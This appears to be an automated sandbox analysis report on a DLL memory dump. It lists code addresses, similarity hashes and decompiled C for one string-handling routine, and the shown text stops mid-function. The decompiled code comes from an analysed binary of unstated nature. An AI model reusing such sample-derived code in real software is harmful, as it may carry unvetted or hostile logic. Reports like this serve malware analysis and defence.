0x6ea12d60
0x00000000
0x6ea12d60
0x6ea12d01
0x6ea12d01
0x6ea12d03
0x00000000
0x00000000
0x6ea12cf1
0x6ea12cf2
0x6ea12cf2
0x6ea12cf2
0x6ea12cf3
0x6ea12c97
0x6ea12c9a
0x6ea12c9c
0x6ea12c9e
0x00000000
0x00000000
0x6ea12ca0
0x6ea12ca3
0x6ea12ca3
0x6ea12ca5
0x6ea12ca5
0x6ea12ca6
0x6ea12cab
0x6ea12caf
0x6ea12cb1
0x00000000
0x00000000
0x6ea12cb3
0x6ea12cb7
0x6ea12cba
0x6ea12cbc
0x00000000
0x00000000
0x00000000
0x6ea12cbc
0x6ea12cbe
0x00000000
0x6ea12cbe
0x6ea12c91
0x6ea12c48
0x00000000
0x6ea12c48
0x6ea12bd1
0x6ea12bd5
0x6ea12bd5
0x6ea12bd8
0x6ea12bec
0x6ea12bf8
0x6ea12bf8
0x6ea12bfe
0x6ea12bfe
0x6ea12c03
0x6ea12c07
0x6ea12c0b
0x6ea12c0d
0x00000000
0x00000000
0x6ea12c13
0x6ea12c16
0x6ea12c18
0x00000000
0x00000000
0x6ea12c1a
0x6ea12c20
0x6ea12c31
0x6ea12c31
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea12c22
0x6ea12c22
0x6ea12c22
0x6ea12c26
0x00000000
0x00000000
0x6ea12c28
0x6ea12c29
0x6ea12c2f
0x00000000
0x00000000
0x00000000
0x6ea12c2f
0x00000000
0x6ea12c22
0x6ea12d69
0x6ea12d6c
0x00000000
0x6ea12d6c
0x6ea12bdc
0x6ea12bde
0x6ea12bde
0x6ea12be1
0x6ea12be1
0x6ea12be5
0x00000000
0x00000000
0x6ea12be7
0x6ea12be8
0x6ea12bea
0x00000000
0x00000000
0x00000000
0x6ea12bea
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea12b87
0x6ea12b87
0x6ea12b87
0x6ea12b8b
0x00000000
0x00000000
0x6ea12b8d
0x6ea12b8e
0x6ea12b94
0x00000000
0x00000000
0x00000000
0x6ea12b94
0x00000000
0x6ea12b87
0x6ea12d73
0x6ea12d76
0x00000000
0x6ea12d76
0x6ea12b41
0x6ea12b43
0x6ea12b43
0x6ea12b46
0x6ea12b46
0x6ea12b4a
0x00000000
0x00000000
0x6ea12b4c
0x6ea12b4d
0x6ea12b4f
0x00000000
0x00000000
0x00000000
0x6ea12b4f
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea12b24
0x6ea12b24
0x6ea12b24
0x6ea12b28
0x00000000
0x00000000
0x6ea12b2a
0x6ea12b2b
0x6ea12b31
0x00000000
0x00000000
0x00000000
0x6ea12b31
0x00000000
0x6ea12b24
0x6ea12d7d
0x6ea12d80
0x00000000
0x6ea12d80
0x6ea12adf
0x6ea12ae1
0x6ea12ae1
0x6ea12ae3
0x6ea12ae3
0x6ea12ae7
0x00000000
0x00000000
0x6ea12ae9
0x6ea12aea
0x6ea12aec
0x00000000
0x00000000
0x00000000
0x6ea12aec
0x00000000
0x6ea12ae3
0x6ea12ac0
0x6ea12ac1
0x6ea12ac5
0x00000000
0x00000000
0x00000000
0x6ea12ac5
0x6ea12d87
0x6ea12d8b
0x6ea12d8f
0x6ea12d95
0x6ea12d95
0x6ea12d96
0x00000000
0x00000000
0x6ea12d9c
0x6ea12da5
0x6ea12daa
0x6ea12dad
0x6ea12db1
0x00000000
0x00000000
0x6ea12db7
0x6ea12dbb
0x6ea12dbf
0x6ea12dbf
0x6ea12dc0
0x6ea12dc1
0x6ea12dcb
0x6ea12dd1
0x6ea12dd4
0x6ea12dd6
0x00000000
0x00000000
0x6ea12dd8
0x6ea12ddb
0x00000000
0x00000000
0x00000000
0x6ea12ddd
0x00000000
0x6ea12dbf
0x6ea12a50
0x6ea12a54
0x6ea12a54
0x6ea12a58
0x00000000
0x00000000
0x6ea12a5e
0x6ea12a5f
0x6ea12a65
0x00000000
0x00000000
0x6ea12a67
0x00000000
0x6ea12a67
0x6ea12de2
0x6ea12de2
0x6ea12de6
0x6ea12de6
0x6ea12de8
0x00000000
0x00000000
0x6ea12dee
0x00000000
0x00000000
0x6ea12df4
0x6ea12df8
0x00000000
0x6ea12df8
0x6ea12e01
0x6ea12e04
0x6ea12e08
0x6ea12e0a
0x00000000
0x6ea12e0a
0x6ea129ef
0x6ea129f3
0x6ea129f5
0x6ea129f5
0x6ea129f7
0x6ea129f7
0x6ea129fb
0x00000000
0x00000000
0x6ea12a01
0x6ea12a02
0x6ea12a04
0x00000000
0x00000000
0x6ea12a06
0x00000000
0x6ea12a06
0x00000000
0x6ea12e10
0x6ea12e10
0x6ea12e14
0x6ea12e18
0x6ea12e18
0x00000000
0x6ea12e20
0x00000000
0x6ea1287e
0x6ea12807
0x6ea1280a
0x6ea1280c
0x6ea1280e
0x00000000
0x00000000
0x6ea12810
0x6ea12814
0x6ea12814
0x6ea12816
0x6ea1281a
0x6ea1281d
0x6ea1281d
0x6ea1281e
0x6ea12823
0x6ea12827
0x6ea12829
0x00000000
0x00000000
0x6ea1282b
0x6ea1282f
0x6ea12832
0x6ea12834
0x00000000
0x00000000
0x00000000
0x6ea12834
0x6ea12836
0x6ea1283a
0x6ea1283e
0x00000000
0x6ea1283e
0x6ea12801
0x6ea127bf
0x00000000
0x6ea127bf
0x6ea1273b
0x6ea1273b
0x6ea1273e
0x6ea12756
0x6ea1275a
0x6ea12766
0x6ea12766
0x6ea1276c
0x6ea1276c
0x6ea12771
0x6ea12775
0x6ea12779
0x6ea1277b
0x00000000
0x00000000
0x6ea12781
0x6ea12784
0x6ea12786
0x00000000
0x00000000
0x6ea12788
0x6ea1278e
0x6ea127a3
0x6ea127a3
0x6ea127a8
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea12790
0x6ea12790
0x6ea12790
0x6ea12794
0x00000000
0x00000000
0x6ea1279a
0x6ea1279b
0x6ea127a1
0x00000000
0x00000000
0x00000000
0x6ea127a1
0x6ea12e25
0x6ea12e25
0x6ea12e28
0x6ea12e36
0x6ea12e2a
0x6ea12e2a
0x6ea12e2d
0x6ea12e2d
0x00000000
0x6ea12e28
0x6ea12e40
0x6ea12e43
0x00000000
0x6ea12e43
0x6ea12742
0x6ea12744
0x6ea12744
0x6ea12747
0x6ea12747
0x6ea1274b
0x00000000
0x00000000
0x6ea12751
0x6ea12752
0x6ea12754
0x00000000
0x00000000
0x00000000
0x6ea12754
0x00000000
0x6ea12747
0x6ea12728
0x00000000
0x6ea12728
0x6ea126de
0x6ea12704
0x6ea12704
0x6ea12706
0x6ea12707
0x6ea1270c
0x00000000
0x6ea1270c
0x6ea126e0
0x6ea126e3
0x6ea126e7
0x00000000
0x00000000
0x6ea126e9
0x6ea126eb
0x6ea126eb
0x6ea126ec
0x6ea126f1
0x6ea126f7
0x00000000
0x00000000
0x6ea126f9
0x6ea126fd
0x6ea12702
0x00000000
0x00000000
0x00000000
0x6ea12702
0x00000000

Strings

@, xrefs: 6EA12718

Memory Dump Source

Source File: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000000.00000002.690389011.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690462400.000000006EA25000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690472523.000000006EA2B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.690481387.000000006EA2C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 933df8fe11205ce58da33e9f299d6ed847c0e435b40f8ebfae3a0afc1ac406fd
Instruction ID: f3911d7e8c134ad93e22d2306e31e0c6930a2c86f34336464d9f29e6bcde7506
Opcode Fuzzy Hash: 933df8fe11205ce58da33e9f299d6ed847c0e435b40f8ebfae3a0afc1ac406fd
Instruction Fuzzy Hash: CD325D3090C3934BD7158EA9C4903AA7BE66FC3314F1D866DE8E54B295DA34CDC1D3AA

Uniqueness

Uniqueness Score: -1.00%

Function 6EA11730, Relevance: 1.9, Strings: 1, Instructions: 649
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E6EA11730(unsigned int __ecx, void* __eflags, signed int* _a4, char _a8) {
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				unsigned int _v68;
				char* _t181;
				signed int _t182;
				signed int* _t188;
				signed int _t192;
				signed int* _t193;
				signed int _t198;
				signed int _t202;
				signed int _t205;
				void* _t206;
				signed int _t211;
				signed int _t214;
				signed int _t226;
				signed int _t228;
				signed int _t233;
				signed int _t236;
				signed int _t237;
				signed int _t240;
				signed int _t241;
				signed int _t244;
				signed int _t245;
				signed int _t251;
				signed int _t252;
				signed int _t258;
				signed int _t260;
				signed int _t261;
				char _t262;
				char _t263;
				signed int _t264;
				signed int _t265;
				void* _t268;
				signed int _t270;
				char _t272;
				unsigned int _t275;
				signed int _t276;
				signed int _t279;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				signed int _t294;
				intOrPtr* _t295;
				void* _t296;
				signed int _t297;
				intOrPtr* _t298;
				signed int _t299;
				signed int _t300;
				void* _t301;
				signed int _t303;
				signed int _t309;
				signed int _t312;
				signed int _t314;
				signed int _t320;
				signed int _t321;
				signed int _t323;
				signed int _t324;
				void* _t325;
				signed int _t326;
				signed int _t327;
				signed int _t330;
				signed int* _t331;
				void* _t332;
				signed int _t333;
				signed int _t334;
				signed int _t335;
				signed int _t339;
				intOrPtr* _t341;
				signed int _t342;
				signed int _t343;
				signed int _t347;
				char _t349;
				char _t350;
				char _t351;
				unsigned int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t360;
				signed int _t361;
				signed int _t363;
				unsigned int _t368;
				signed int _t370;
				signed int _t372;
				signed int _t377;
				signed int _t378;
				signed int _t379;
				signed int _t382;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				void* _t391;

				_v56 = 0;
				_t353 = __ecx;
				_v52 = 0;
				_push(0x40);
				_t363 = E6EA01030();
				_t391 = (_t388 & 0xfffffff0) - 0x34 + 4;
				_t181 = _v56;
				if(_t181 == 0) {
					 *_t363 = 0;
					L8:
					_t182 = _a8;
					_v52 = 0x40;
					_v56 = _t363;
					if(_t182 != 0) {
						__eflags = _t363;
						if(_t363 == 0) {
							_t260 = 0x40;
							_t240 = 0;
							L22:
							_t20 = _t240 + 2; // 0x80000001
							_t289 = _t20;
							__eflags = _t289 - 0x40;
							_t290 =  <=  ? 0x40 : _t289;
							__eflags = _t260 - _t290;
							if(_t260 < _t290) {
								_t368 = (_t290 >> 5 >> 0x1a) + _t290 >> 6;
								_t291 = _t290 & 0x8000003f;
								__eflags = _t291;
								if(_t291 < 0) {
									_t291 = (_t291 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t291;
								}
								__eflags = _t291;
								_t370 = _t368 + (0 | _t291 > 0x00000000) << 6;
								_push(_t370);
								_t261 = E6EA01030();
								_t391 = _t391 + 4;
								_t292 = _v56;
								__eflags = _t292;
								if(_t292 == 0) {
									 *_t261 = 0;
									goto L35;
								} else {
									__eflags = _t261;
									if(_t261 == 0) {
										L33:
										_push(1);
										_push(_t292);
										_v68 = _t261;
										E6EA010B0();
										_t261 = _v68;
										_t391 = _t391 + 8;
										L35:
										_v52 = _t370;
										_v56 = _t261;
										L36:
										 *((char*)(_t261 + _t240)) = _a8;
										_t188 =  &_v56;
										 *((char*)(_t240 +  *_t188 + 1)) = 0;
										L37:
										_t294 =  *_t188;
										if(_t294 == 0) {
											L39:
											_t295 = _a4;
											_push(0x40);
											 *_t295 = 0;
											 *((intOrPtr*)(_t295 + 4)) = 0;
											_t241 = E6EA01030();
											_t391 = _t391 + 4;
											_t192 =  *_a4;
											if(_t192 == 0) {
												 *_t241 = 0;
												L60:
												_t193 = _a4;
												 *_t193 = _t241;
												_t193[1] = 0x40;
												L61:
												_push(1);
												_push(_v56);
												E6EA010B0();
												_v56 = 0;
												_v52 = 0;
												return _a4;
											}
											if(_t241 == 0) {
												L45:
												_push(1);
												_push(_t192);
												E6EA010B0();
												_t391 = _t391 + 8;
												goto L60;
											}
											_t296 =  *_t192;
											 *_t241 = _t296;
											if(_t296 == 0) {
												goto L45;
											}
											_t297 = 0;
											while(1) {
												_t297 = _t297 + 1;
												_t262 =  *((char*)(_t192 + _t297 * 2 - 1));
												 *((char*)(_t241 + _t297 * 2 - 1)) = _t262;
												if(_t262 == 0) {
													goto L45;
												}
												_t263 =  *((char*)(_t192 + _t297 * 2));
												 *((char*)(_t241 + _t297 * 2)) = _t263;
												if(_t263 != 0) {
													continue;
												}
												goto L45;
											}
											goto L45;
										}
										_t198 =  *_t294;
										if(_t198 != 0) {
											_t355 =  *_t353;
											__eflags = _t355;
											if(_t355 == 0) {
												L52:
												_t298 = _a4;
												_push(0x40);
												 *_t298 = 0;
												 *((intOrPtr*)(_t298 + 4)) = 0;
												_t241 = E6EA01030();
												_t391 = _t391 + 4;
												_t202 =  *_a4;
												__eflags = _t202;
												if(_t202 == 0) {
													 *_t241 = 0;
													goto L60;
												}
												__eflags = _t241;
												if(_t241 == 0) {
													L58:
													_push(1);
													_push(_t202);
													E6EA010B0();
													_t391 = _t391 + 8;
													goto L60;
												}
												_t299 =  *_t202;
												 *_t241 = _t299;
												__eflags = _t299;
												if(_t299 == 0) {
													goto L58;
												}
												_t300 = 0;
												__eflags = 0;
												while(1) {
													_t300 = _t300 + 1;
													_t264 =  *((char*)(_t202 + _t300 * 2 - 1));
													 *(_t241 + _t300 * 2 - 1) = _t264;
													__eflags = _t264;
													if(_t264 == 0) {
														goto L58;
													}
													_t265 =  *((char*)(_t202 + _t300 * 2));
													 *(_t241 + _t300 * 2) = _t265;
													__eflags = _t265;
													if(_t265 != 0) {
														continue;
													}
													goto L58;
												}
												goto L58;
											}
											__eflags =  *_t355;
											if( *_t355 == 0) {
												goto L52;
											}
											_v48 = _t198;
											_t372 = _t198 - 0x41;
											__eflags = _t372 - 0x19;
											_v64 = _t372;
											_t267 =  >  ? _t198 : _t198 + 0x20;
											_t243 =  >  ? _t198 : _t198 + 0x20;
											_t268 = 0;
											__eflags = 0;
											_v68 =  >  ? _t198 : _t198 + 0x20;
											_v36 = _t294;
											_t244 = _t355;
											while(1) {
												_t301 =  *_t244;
												__eflags = _t301 - 0x41 - 0x19;
												_t302 =  <=  ? _t301 + 0x20 : _t301;
												__eflags = ( <=  ? _t301 + 0x20 : _t301) - _v68;
												if(( <=  ? _t301 + 0x20 : _t301) == _v68) {
													break;
												}
												_t268 = _t268 + 1;
												_t244 = _t244 + 1;
												__eflags =  *((char*)(_t268 + _t355));
												if( *((char*)(_t268 + _t355)) != 0) {
													continue;
												}
												goto L52;
											}
											_t205 = _v48;
											_t303 = _v36;
											__eflags = _t244;
											if(_t244 == 0) {
												goto L52;
											}
											_t270 = _t303 & 0x0000000f;
											_v44 = _t205 + 0x20;
											asm("pxor xmm0, xmm0");
											_v40 = _t355;
											_t377 =  ~_t270 + 0x10;
											__eflags = _t377;
											_v48 = _t205;
											_v36 = _t303;
											do {
												_t356 = _t270;
												__eflags = _t270;
												if(_t270 == 0) {
													L69:
													_v32 = _t377;
													_t309 =  ~( ~_t356 + 0x0000000f & 0x0000000f) + 0x7fffffff;
													__eflags = _t309;
													_t378 = _v36;
													while(1) {
														asm("movdqu xmm1, [esi+edi]");
														asm("pcmpeqb xmm1, xmm0");
														asm("pmovmskb eax, xmm1");
														__eflags = _t205;
														if(_t205 != 0) {
															break;
														}
														_t356 = _t356 + 0x10;
														__eflags = _t356 - _t309;
														if(_t356 < _t309) {
															continue;
														}
														_v36 = _t378;
														_t379 = _v32;
														__eflags = _t309 - 0x7fffffff;
														if(_t309 >= 0x7fffffff) {
															L77:
															_t309 = 0x7fffffff;
															L78:
															_v60 = _t309;
															_t206 = 0;
															__eflags = 0;
															_v68 = _t270;
															_v32 = _t379;
															while(1) {
																_t310 =  *((char*)(_t206 + _t244));
																_t272 =  *((char*)(_t206 + _v36));
																_t110 = _t310 - 0x61; // 0x7fffff9e
																__eflags = _t110 - 0x19;
																_t111 = _t310 - 0x20; // 0x7fffffdf
																_t311 =  <=  ? _t111 :  *((char*)(_t206 + _t244));
																__eflags = _t272 - 0x61 - 0x19;
																_t312 =  <=  ? _t111 :  *((char*)(_t206 + _t244));
																_t273 =  <=  ? _t272 - 0x20 : _t272;
																_t274 =  <=  ? _t272 - 0x20 : _t272;
																__eflags = _t312 - ( <=  ? _t272 - 0x20 : _t272);
																if(__eflags < 0 || __eflags > 0) {
																	break;
																}
																__eflags = _t312;
																if(_t312 == 0) {
																	L83:
																	_t360 = _v40;
																	__eflags = _t244;
																	if(_t244 == 0) {
																		goto L52;
																	}
																	_t245 = _t244 - _t360;
																	__eflags = _t245;
																	if(_t245 != 0) {
																		_t279 = _t360 & 0x0000000f;
																		__eflags = _t279;
																		if(_t279 == 0) {
																			L97:
																			_t320 =  ~( ~_t279 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																			__eflags = _t320;
																			while(1) {
																				asm("movdqu xmm1, [edi+ecx]");
																				asm("pcmpeqb xmm1, xmm0");
																				asm("pmovmskb eax, xmm1");
																				__eflags = _t205;
																				if(_t205 != 0) {
																					break;
																				}
																				_t279 = _t279 + 0x10;
																				__eflags = _t279 - _t320;
																				if(_t279 < _t320) {
																					continue;
																				}
																				__eflags = _t320 - 0x7fffffff;
																				if(_t320 >= 0x7fffffff) {
																					L103:
																					_t320 = 0x7fffffff;
																					L104:
																					_t211 = _t320 >> 0x0000001f & _t320;
																					_t321 = _t320 - _t211;
																					__eflags = _t245;
																					if(_t245 < 0) {
																						L106:
																						_t245 = _t321;
																						L107:
																						_t280 = _a4;
																						 *_t280 = 0;
																						 *((intOrPtr*)(_t280 + 4)) = 0;
																						_t386 = _t211 + _t360;
																						__eflags = _t386;
																						_v64 = _t386;
																						if(_t386 == 0) {
																							L141:
																							_push(0x40);
																							_t241 = E6EA01030();
																							_t391 = _t391 + 4;
																							_t214 =  *_a4;
																							__eflags = _t214;
																							if(_t214 == 0) {
																								 *_t241 = 0;
																								goto L60;
																							}
																							__eflags = _t241;
																							if(_t241 == 0) {
																								L147:
																								_push(1);
																								_push(_t214);
																								E6EA010B0();
																								_t391 = _t391 + 8;
																								goto L60;
																							}
																							_t323 =  *_t214;
																							 *_t241 = _t323;
																							__eflags = _t323;
																							if(_t323 == 0) {
																								goto L147;
																							}
																							_t324 = 0;
																							__eflags = 0;
																							while(1) {
																								_t324 = _t324 + 1;
																								_t281 =  *((char*)(_t214 + _t324 * 2 - 1));
																								 *(_t241 + _t324 * 2 - 1) = _t281;
																								__eflags = _t281;
																								if(_t281 == 0) {
																									goto L147;
																								}
																								_t282 =  *((char*)(_t214 + _t324 * 2));
																								 *(_t241 + _t324 * 2) = _t282;
																								__eflags = _t282;
																								if(_t282 != 0) {
																									continue;
																								}
																								goto L147;
																							}
																							goto L147;
																						}
																						__eflags =  *(_t360 + _t211);
																						if( *(_t360 + _t211) == 0) {
																							goto L141;
																						}
																						__eflags = _t245;
																						if(_t245 != 0) {
																							L121:
																							_t137 = _t245 + 1; // 0x80000000
																							_t325 = _t137;
																							__eflags = _t325 - 0x40;
																							_t326 =  <=  ? 0x40 : _t325;
																							__eflags = _t326;
																							if(_t326 > 0) {
																								_v68 = (_t326 >> 5 >> 0x1a) + _t326 >> 6;
																								_t327 = _t326 & 0x8000003f;
																								__eflags = _t327;
																								if(_t327 < 0) {
																									_t327 = (_t327 - 0x00000001 | 0xffffffc0) + 1;
																									__eflags = _t327;
																								}
																								__eflags = _t327;
																								_t330 = _v68 + (0 | _t327 > 0x00000000) << 6;
																								_v68 = _t330;
																								_push(_t330);
																								_t387 = E6EA01030();
																								_t391 = _t391 + 4;
																								_t226 =  *_a4;
																								__eflags = _t226;
																								if(_t226 == 0) {
																									 *_t387 = 0;
																									goto L133;
																								} else {
																									__eflags = _t387;
																									if(_t387 == 0) {
																										L131:
																										_push(1);
																										_push(_t226);
																										E6EA010B0();
																										_t391 = _t391 + 8;
																										L133:
																										_t331 = _a4;
																										_t331[1] = _v68;
																										 *_t331 = _t387;
																										L134:
																										__eflags = _t387;
																										if(_t387 == 0) {
																											goto L61;
																										}
																										_t283 = _v64;
																										_t332 = 0;
																										while(1) {
																											_t228 =  *_t283;
																											_t332 = _t332 + 1;
																											 *_t387 = _t228;
																											__eflags = _t245;
																											if(_t245 == 0) {
																												goto L139;
																											}
																											__eflags = _t332 - _t245;
																											if(_t332 == _t245) {
																												 *(_t387 + 1) = 0;
																												goto L61;
																											}
																											L139:
																											__eflags = _t228;
																											if(_t228 == 0) {
																												goto L61;
																											}
																											_t387 = _t387 + 1;
																											_t283 = _t283 + 1;
																											__eflags = _t283;
																										}
																									}
																									_t333 =  *_t226;
																									 *_t387 = _t333;
																									__eflags = _t333;
																									if(_t333 == 0) {
																										goto L131;
																									}
																									_t284 = 0;
																									__eflags = 0;
																									while(1) {
																										_t284 = _t284 + 1;
																										_t334 =  *((char*)(_t226 + _t284 * 2 - 1));
																										 *(_t387 + _t284 * 2 - 1) = _t334;
																										__eflags = _t334;
																										if(_t334 == 0) {
																											goto L131;
																										}
																										_t335 =  *((char*)(_t226 + _t284 * 2));
																										 *(_t387 + _t284 * 2) = _t335;
																										__eflags = _t335;
																										if(_t335 != 0) {
																											continue;
																										}
																										goto L131;
																									}
																									goto L131;
																								}
																							}
																							_t387 = 0;
																							goto L134;
																						}
																						_t361 = _t360 + _t211;
																						_t339 = _t361 & 0x0000000f;
																						__eflags = _t339;
																						if(_t339 == 0) {
																							L114:
																							_t245 =  ~( ~_t339 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																							__eflags = _t245;
																							while(1) {
																								asm("movdqu xmm1, [edi+edx]");
																								asm("pcmpeqb xmm1, xmm0");
																								asm("pmovmskb eax, xmm1");
																								__eflags = _t211;
																								if(_t211 != 0) {
																									break;
																								}
																								_t339 = _t339 + 0x10;
																								__eflags = _t339 - _t245;
																								if(_t339 < _t245) {
																									continue;
																								}
																								__eflags = _t245 - 0x7fffffff;
																								if(_t245 >= 0x7fffffff) {
																									L120:
																									_t245 = 0x7fffffff;
																									goto L121;
																								} else {
																									goto L118;
																								}
																								while(1) {
																									L118:
																									__eflags =  *((char*)(_t245 + _t361));
																									if( *((char*)(_t245 + _t361)) == 0) {
																										goto L121;
																									}
																									_t245 = _t245 + 1;
																									__eflags = _t245 - 0x7fffffff;
																									if(_t245 < 0x7fffffff) {
																										continue;
																									}
																									goto L120;
																								}
																								goto L121;
																							}
																							asm("bsf ebx, eax");
																							_t245 = _t245 + _t339;
																							goto L121;
																						}
																						_t245 = 0;
																						_t339 =  ~_t339 + 0x10;
																						__eflags = _t339;
																						while(1) {
																							__eflags =  *((char*)(_t245 + _t361));
																							if( *((char*)(_t245 + _t361)) == 0) {
																								goto L121;
																							}
																							_t245 = _t245 + 1;
																							__eflags = _t245 - _t339;
																							if(_t245 < _t339) {
																								continue;
																							}
																							goto L114;
																						}
																						goto L121;
																					}
																					__eflags = _t245 - _t321;
																					if(_t245 <= _t321) {
																						goto L107;
																					}
																					goto L106;
																				} else {
																					goto L101;
																				}
																				while(1) {
																					L101:
																					__eflags =  *((char*)(_t320 + _t360));
																					if( *((char*)(_t320 + _t360)) == 0) {
																						goto L104;
																					}
																					_t320 = _t320 + 1;
																					__eflags = _t320 - 0x7fffffff;
																					if(_t320 < 0x7fffffff) {
																						continue;
																					}
																					goto L103;
																				}
																				goto L104;
																			}
																			asm("bsf edx, eax");
																			_t320 = _t320 + _t279;
																			goto L104;
																		}
																		_t320 = 0;
																		_t279 =  ~_t279 + 0x10;
																		__eflags = _t279;
																		while(1) {
																			__eflags =  *((char*)(_t320 + _t360));
																			if( *((char*)(_t320 + _t360)) == 0) {
																				goto L104;
																			}
																			_t320 = _t320 + 1;
																			__eflags = _t320 - _t279;
																			if(_t320 < _t279) {
																				continue;
																			}
																			goto L97;
																		}
																		goto L104;
																	}
																	_t341 = _a4;
																	_push(0x40);
																	 *_t341 = 0;
																	 *((intOrPtr*)(_t341 + 4)) = 0;
																	_t241 = E6EA01030();
																	_t391 = _t391 + 4;
																	_t233 =  *_a4;
																	__eflags = _t233;
																	if(_t233 == 0) {
																		 *_t241 = 0;
																		goto L60;
																	}
																	__eflags = _t241;
																	if(_t241 == 0) {
																		L91:
																		_push(1);
																		_push(_t233);
																		E6EA010B0();
																		_t391 = _t391 + 8;
																		goto L60;
																	}
																	_t342 =  *_t233;
																	 *_t241 = _t342;
																	__eflags = _t342;
																	if(_t342 == 0) {
																		goto L91;
																	}
																	_t343 = 0;
																	__eflags = 0;
																	while(1) {
																		_t343 = _t343 + 1;
																		_t286 =  *((char*)(_t233 + _t343 * 2 - 1));
																		 *(_t241 + _t343 * 2 - 1) = _t286;
																		__eflags = _t286;
																		if(_t286 == 0) {
																			goto L91;
																		}
																		_t287 =  *((char*)(_t233 + _t343 * 2));
																		 *(_t241 + _t343 * 2) = _t287;
																		__eflags = _t287;
																		if(_t287 != 0) {
																			continue;
																		}
																		goto L91;
																	}
																	goto L91;
																}
																_t206 = _t206 + 1;
																__eflags = _t206 - _v60;
																if(_t206 < _v60) {
																	continue;
																}
																goto L83;
															}
															_t275 = _v68;
															_t382 = _v32;
															_t314 = _t244 + 1;
															__eflags = _t314;
															if(_t314 == 0) {
																goto L52;
															}
															__eflags = _v64 - 0x19;
															_t208 =  <=  ? _v44 : _v48;
															_t205 =  <=  ? _v44 : _v48;
															__eflags =  *(_t244 + 1);
															if( *(_t244 + 1) == 0) {
																goto L52;
															}
															_v68 = _t275;
															_v32 = _t382;
															while(1) {
																_t244 = _t244 + 1;
																_t314 = _t314 + 1;
																_t276 =  *_t244 & 0x000000ff;
																__eflags =  *((char*)(_t314 - 1)) + 0xffffffbf - 0x19;
																_t277 =  <=  ? _t276 + 0x20 : _t276;
																__eflags = ( <=  ? _t276 + 0x20 : _t276) - _t205;
																if(( <=  ? _t276 + 0x20 : _t276) == _t205) {
																	goto L163;
																}
																__eflags =  *_t314;
																if( *_t314 != 0) {
																	continue;
																}
																goto L52;
															}
															goto L163;
														}
														_t205 = _v36;
														while(1) {
															__eflags =  *((char*)(_t309 + _t205));
															if( *((char*)(_t309 + _t205)) == 0) {
																break;
															}
															_t309 = _t309 + 1;
															__eflags = _t309 - 0x7fffffff;
															if(_t309 < 0x7fffffff) {
																continue;
															}
															_v36 = _t205;
															goto L77;
														}
														L158:
														_v36 = _t205;
														L159:
														__eflags = _t309;
														if(__eflags == 0) {
															goto L77;
														}
														if(__eflags > 0) {
															goto L78;
														}
														goto L83;
													}
													asm("bsf edx, eax");
													_v36 = _t378;
													_t309 = _t309 + _t356;
													_t379 = _v32;
													goto L159;
												}
												_t205 = _v36;
												_t356 = _t377;
												_t309 = 0;
												__eflags = 0;
												while(1) {
													__eflags =  *((char*)(_t309 + _t205));
													if( *((char*)(_t309 + _t205)) == 0) {
														goto L158;
													}
													_t309 = _t309 + 1;
													__eflags = _t309 - _t377;
													if(_t309 < _t377) {
														continue;
													}
													_v36 = _t205;
													goto L69;
												}
												goto L158;
												L163:
												_t270 = _v68;
												_t377 = _v32;
												__eflags = _t244;
											} while (_t244 != 0);
											goto L52;
										}
										goto L39;
									}
									_t236 =  *_t292;
									 *_t261 = _t236;
									__eflags = _t236;
									if(_t236 == 0) {
										goto L33;
									}
									_v60 = _t370;
									_t237 = 0;
									__eflags = 0;
									_v64 = _t240;
									_v68 = _t353;
									while(1) {
										_t237 = _t237 + 1;
										_t251 =  *((char*)(_t292 + _t237 * 2 - 1));
										 *(_t261 + _t237 * 2 - 1) = _t251;
										__eflags = _t251;
										if(_t251 == 0) {
											break;
										}
										_t252 =  *((char*)(_t292 + _t237 * 2));
										 *(_t261 + _t237 * 2) = _t252;
										__eflags = _t252;
										if(_t252 != 0) {
											continue;
										}
										break;
									}
									_t370 = _v60;
									_t240 = _v64;
									_t353 = _v68;
									goto L33;
								}
							}
							_t261 = _v56;
							goto L36;
						}
						_t347 = _t363 & 0x0000000f;
						__eflags = _t347;
						if(_t347 == 0) {
							L15:
							asm("pxor xmm0, xmm0");
							_t258 =  ~( ~_t347 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							__eflags = _t258;
							while(1) {
								asm("movdqu xmm1, [esi+edx]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb eax, xmm1");
								__eflags = _t182;
								if(_t182 != 0) {
									break;
								}
								_t347 = _t347 + 0x10;
								__eflags = _t347 - _t258;
								if(_t347 < _t258) {
									continue;
								}
								__eflags = _t258 - 0x7fffffff;
								if(_t258 >= 0x7fffffff) {
									L21:
									_t260 = 0x40;
									_t240 = 0x7fffffff;
									goto L22;
								} else {
									goto L19;
								}
								while(1) {
									L19:
									__eflags =  *((char*)(_t258 + _t363));
									if( *((char*)(_t258 + _t363)) == 0) {
										break;
									}
									_t258 = _t258 + 1;
									__eflags = _t258 - 0x7fffffff;
									if(_t258 < 0x7fffffff) {
										continue;
									}
									goto L21;
								}
								L165:
								__eflags = _t240 - 0xfffffffe;
								if(_t240 != 0xfffffffe) {
									_t260 = 0x40;
								} else {
									 *_t363 = 0;
									_t260 = _v52;
								}
								goto L22;
							}
							asm("bsf ebx, eax");
							_t240 = _t258 + _t347;
							goto L165;
						}
						_t240 = 0;
						_t347 =  ~_t347 + 0x10;
						__eflags = _t347;
						while(1) {
							__eflags =  *((char*)(_t240 + _t363));
							if( *((char*)(_t240 + _t363)) == 0) {
								goto L165;
